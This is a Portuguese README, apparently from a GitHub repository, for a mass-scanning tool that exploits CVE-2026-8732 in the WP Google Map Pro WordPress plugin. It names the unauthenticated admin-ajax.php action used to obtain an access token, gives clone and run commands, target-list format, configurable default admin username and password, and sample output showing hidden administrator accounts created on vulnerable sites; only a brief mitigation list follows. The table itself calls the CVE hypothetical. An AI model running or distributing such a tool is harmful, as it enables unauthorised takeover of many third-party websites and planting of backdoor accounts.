
# Scanner em massa multi-threaded para CVE-2026-8732 no WordPress WP Google Map Pro. Automatiza a extração de nonce, exploração de token e criação de conta de administrador oculta em sites vulneráveis.
Esta ferramenta explora a CVE-2026-8732, uma vulnerabilidade no plugin WP Google Map Pro para WordPress. A vulnerabilidade permite que um atacante não autenticado obtenha um wpmp_token válido por meio de um endpoint AJAX (admin-ajax.php?action=wpgmp_temp_access_ajax). Usando esse token, um atacante pode acessar o painel administrativo do WordPress e criar um novo usuário administrador.
A ferramenta realiza varredura em massa a partir de uma lista de domínios, extrai o nonce e o token e cria automaticamente uma conta de administrador oculta em sites vulneráveis. Os resultados são salvos em tempo real com todos os detalhes do token.
admin_created.txthttp:// quanto https://requestsInstale a biblioteca necessária:
pip install requests
🚀 Instalação
git clone https://github.com/CVE-2026-8732-POC/CVE-2026-8732.git
cd CVE-2026-8732
🎯 Uso
Prepare um arquivo de lista de alvos (um domínio por linha):
example.com
https://target-website.com
http://vulnerable-site.org
Execute o scanner:
python2 exploit.py targets.txt
Arquivos de Saída
Arquivo Conteúdo res.txt Domínios vulneráveis com token completo e URL de redirecionamento (se houver) admin_created.txt Credenciais de administrador criadas com sucesso (domínio, usuário, senha, email)
Exemplo de Saída
[*] Checking: https://example.com
[VULNERABLE] https://example.com -> Token found
[*] https://example.com -> Accessing redirect URL...
[+] https://example.com -> Admin created: securityaudit_1734567890 / StrongP@ssw0rd123!
⚙️ Configuração
Edite as seguintes variáveis dentro do script:
TIMEOUT = 10 # Request timeout in seconds
JUMLAH_THREAD = 10 # Number of concurrent threads
OUTPUT_FILE = "res.txt" # File for vulnerable results
ADMIN_FILE = "admin_created.txt"
BASE_USERNAME = "securityaudit"
NEW_PASSWORD = "StrongP@ssw0rd123!"
NEW_EMAIL = "[email protected]"
🧠 Como Funciona
🛡️ Mitigação
· Atualize o WP Google Map Pro para a versão corrigida mais recente. · Desative a ação AJAX wpgmp_temp_access_ajax por meio de código personalizado ou firewall. · Use um Web Application Firewall (WAF) para bloquear requisições maliciosas para admin-ajax.php.
| Campo | Valor |
|---|
| ID CVE | CVE-2026-8732 (hipotética para este plugin) |
| Plugin Afetado | WP Google Map Pro (versões <= 1.5.0) |
| Tipo de Vulnerabilidade | Controle de Acesso Quebrado / Escalação de Privilégios |
| Vetor de Ataque | Não autenticado, Remoto |
| Impacto | Assunção total do site por meio da criação de conta de administrador |